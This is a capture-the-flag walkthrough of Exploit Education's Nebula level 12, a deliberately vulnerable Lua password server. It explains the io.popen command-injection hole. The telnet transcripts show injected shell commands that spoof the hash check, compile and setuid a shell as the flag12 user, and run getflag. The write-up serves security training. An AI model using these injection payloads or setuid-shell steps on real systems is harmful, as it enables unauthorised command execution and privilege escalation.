Question URL: https://exploit.education/nebula/level-12/

Source Code:

local socket = require("socket")
local server = assert(socket.bind("127.0.0.1", 50001))

function hash(password)
        -- Attack #1: Directly break the hash with rainbow table
        -- Attack #2: Exploit io.popen() vulnerability - OS Command injection
        -- io.popen(command, mode) - Creates a pipe and executes a command
        -- ".." does string concatenation in lua
        -- io.popen() reads password given and does sha1sum
        -- Lua vulnerability: https://seclists.org/fulldisclosure/2014/May/128
        prog = io.popen("echo "..password.." | sha1sum", "r")
        data = prog:read("*all") -- *all means "reads the whole file"
        prog:close()

        -- string.sub(s, i [,j]) - Returns the substring of s that starts at
        -- i and continues untile j
        -- sha1sum creates 160-bit hash (40 hex characters)
        data = string.sub(data, 1, 40)

        return data
end


while 1 do
        local client = server:accept()
        client:send("Password: ")
        client:settimeout(60)
        local line, err = client:receive()
        if not err then
                print("trying " .. line) -- log from where ;\
                local h = hash(line)
                -- ~= means not equal
                if h ~= "4754a4f4bd5787accd33de887b9250a0691dd198" then
                        client:send("Better luck next time\n");
                else
                        client:send("Congrats, your token is 413**CARRIER LOST**\n")
                end

        end

        client:close()
end

Code Analysis:
a. flag12.lua is a server daemon program listening on port 50001 with the privilege of flag12
b. When a new client is connected, Server responds back with "Password: " and grabs the response from the client.
c. The collected response is considered as password and the program calculates the sha1 hash value of the password
d. If the hash values is matched to "4754a4f4bd5787accd33de887b9250a0691dd198", the password is correct and the server respondses back
   with "Congrats, your token is 413**CARRIER LOST**" and the connection is closed

Code vulnerability
- The vulnerabiliy of this program is the io.popen(command, mode) command. Basically if a program doesn't valudate the user's 
  input(command), the program will be vulnerable against the manipulated user's input (command)
 :io.popen(command, mode) - Creates a pipe and executes a command (Lua vulnerability: https://seclists.org/fulldisclosure/2014/May/128)

Sol.
a. Simply we properly manipulate OS commands and send it to the server code, the server will execute the OS commands.
- Send a expecting hash value
Actual OS command to be sent: "echo 4754a4f4bd5787accd33de887b9250a0691dd198;echo 1 | sha1sum"

level12@nebula:~$ telnet 127.0.0.1 50001
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
Password: 4754a4f4bd5787accd33de887b9250a0691dd198;echo 1
Congrats, your token is 413**CARRIER LOST**
Connection closed by foreign host.



- Create a /tmp/shell.c which create a shell of the running process (Server daemon with flag12 privilege) and compile it with flag12
  privilege
  Actual OS command to be sent: "echo 1;gcc -o /home/flag12/shell /tmp/shell.c; chmod +s /home/flag12/shell; echo 1 | sha1sum"
level12@nebula:~$ telnet 127.0.0.1 50001
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
Password: 1;gcc -o /home/flag12/shell /tmp/shell.c; chmod +s /home/flag12/shell; echo 1
Better luck next time
Connection closed by foreign host.
level12@nebula:~$ ls -al /home/flag12
total 14
drwxr-x--- 1 flag12 level12   60 2019-02-17 19:17 .
drwxr-xr-x 1 root   root      80 2012-08-27 07:18 ..
-rw-r--r-- 1 flag12 flag12   220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag12 flag12  3353 2011-05-18 02:54 .bashrc
-rw-r--r-- 1 root   root     685 2011-11-20 21:22 flag12.lua
-rw-r--r-- 1 flag12 flag12   675 2011-05-18 02:54 .profile
-rwsr-sr-x 1 flag12 flag12  7202 2019-02-17 19:17 shell
level12@nebula:~$ /home/flag12/shell
sh-4.2$ id
uid=987(flag12) gid=1013(level12) egid=987(flag12) groups=987(flag12),1013(level12)
sh-4.2$ getflag
You have successfully executed getflag on a target account
sh-4.2$

- Send /bin/getflag and save its output under /home/flag12
level12@nebula:~$ telnet 127.0.0.1 50001
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
Password: 1;/bin/getflag > /home/flag12/getflag.out;echo 1
Better luck next time
Connection closed by foreign host.
level12@nebula:~$ ls -al /home/flag12
total 18
drwxr-x--- 1 flag12 level12   80 2019-02-17 19:20 .
drwxr-xr-x 1 root   root      80 2012-08-27 07:18 ..
-rw-r--r-- 1 flag12 flag12   220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag12 flag12  3353 2011-05-18 02:54 .bashrc
-rw-r--r-- 1 root   root     685 2011-11-20 21:22 flag12.lua
-rw-r--r-- 1 flag12 flag12    59 2019-02-17 19:20 getflag.out
-rw-r--r-- 1 flag12 flag12   675 2011-05-18 02:54 .profile
-rwsr-sr-x 1 flag12 flag12  7202 2019-02-17 19:19 shell
level12@nebula:~$ more /home/flag12/getflag.out
You have successfully executed getflag on a target account
level12@nebula:~$
